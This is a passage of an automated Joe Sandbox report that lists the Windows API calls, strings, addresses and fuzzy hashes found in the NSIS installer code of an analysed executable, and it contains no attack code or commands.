                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft

                                                                                                    Control-flow Graph: nodes 495 to 556, first basic block 40337f-403396
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 004033E7
                                                                                                    • GetTickCount.KERNEL32 ref: 00403464
                                                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                                    • wsprintfW.USER32 ref: 004034A4
                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                                    • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                                    Similarity
                                                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                                                    • String ID: ... %d%%$P1B$X1C$X1C

                                                                                                    Control-flow Graph: nodes 557 to 589, first basic block 401eb9-401ec4
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                    • GlobalFree.KERNELBASE(00715CD8), ref: 00402387
                                                                                                    Similarity
                                                                                                    • API ID: FreeGloballstrcpyn
                                                                                                    • String ID: 232$Exch: stack < %d elements$Pop: stack empty

                                                                                                    Control-flow Graph: nodes 592 to 603, first basic block 4022fd-402325
                                                                                                    APIs
                                                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                    • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                    • GlobalFree.KERNELBASE(00715CD8), ref: 00402387
                                                                                                    Similarity
                                                                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf

                                                                                                    Control-flow Graph: nodes 608 to 622, first basic block 402b23-402b37
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                    • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                    Similarity
                                                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen

                                                                                                    Control-flow Graph: nodes 625 to 636, first basic block 402713-40273b
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                    • String ID: 232$<RM>$WriteINIStr: wrote [%s] %s=%s in %s

                                                                                                    Control-flow Graph: nodes 732 to 744, first basic block 4021b5-40220b
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    Strings
                                                                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                    • API String ID: 3156913733-2180253247

                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                                    Similarity
                                                                                                    • API ID: CountFileNameTempTick
                                                                                                    • String ID: nsa
                                                                                                    • API String ID: 1716503409-2209301699

                                                                                                    APIs
                                                                                                    • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                                    • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                                    Similarity
                                                                                                    • API ID: Global$AllocFree
                                                                                                    • String ID:
                                                                                                    • API String ID: 3394109436-0
                                                                                                    • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                    • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                                    • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                    • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                    • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                                    • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                    • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$AttributesCreate
                                                                                                    • String ID:
                                                                                                    • API String ID: 415043291-0
                                                                                                    • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                    • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                                    • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                    • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                    • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                                    • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                    • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                                    APIs
                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                    • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                                    • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                    • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                    • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                                                    • String ID:
                                                                                                    • API String ID: 4115351271-0
                                                                                                    • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                    • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                                    • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                    • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 973152223-0
                                                                                                    • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                    • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                                    • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                    • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                                    • GetClientRect.USER32(?,?), ref: 00405196
                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                                      • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004052C0
                                                                                                    • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                                    • ShowWindow.USER32(00000008), ref: 00405333
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                                    • CreatePopupMenu.USER32 ref: 00405376
                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                                    • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                                    • EmptyClipboard.USER32 ref: 00405411
                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                                    • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405427
                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040545D
                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                                    • CloseClipboard.USER32 ref: 0040546E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                    • String ID: @rD$New install of "%s" to "%s"${
                                                                                                    • API String ID: 2110491804-2409696222
                                                                                                    • Opcode ID: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                                                                    • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                                    • Opcode Fuzzy Hash: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                                                                    • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                                    • DeleteObject.GDI32(?), ref: 00404A79
                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                                    • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                    • String ID: $ @$M$N
                                                                                                    • API String ID: 1638840714-3479655940
                                                                                                    • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                    • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                                    • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                    • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                                    • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                                    • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                                      • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                      • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000), ref: 00403E8F
                                                                                                    • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                    • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                                    Strings
                                                                                                    Similarity
